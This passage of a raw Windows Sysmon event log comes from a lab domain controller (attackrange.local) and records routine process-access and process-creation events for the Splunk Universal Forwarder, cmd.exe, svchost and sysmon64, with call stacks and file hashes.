Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.655{59A5CD1D-8EE3-6005-B600-00000000A301}28202816C:\Windows\system32\cmd.exe{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.658{59A5CD1D-8EE3-6005-B700-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000003633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.655{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.639{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.652{59A5CD1D-8EE3-6005-B600-00000000A301}2820C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000003620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.639{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-B500-00000000A301}2836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.623{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000003617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.623{59A5CD1D-8EE3-6005-B300-00000000A301}648812C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-B400-00000000A301}872C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.623{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:35.608{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 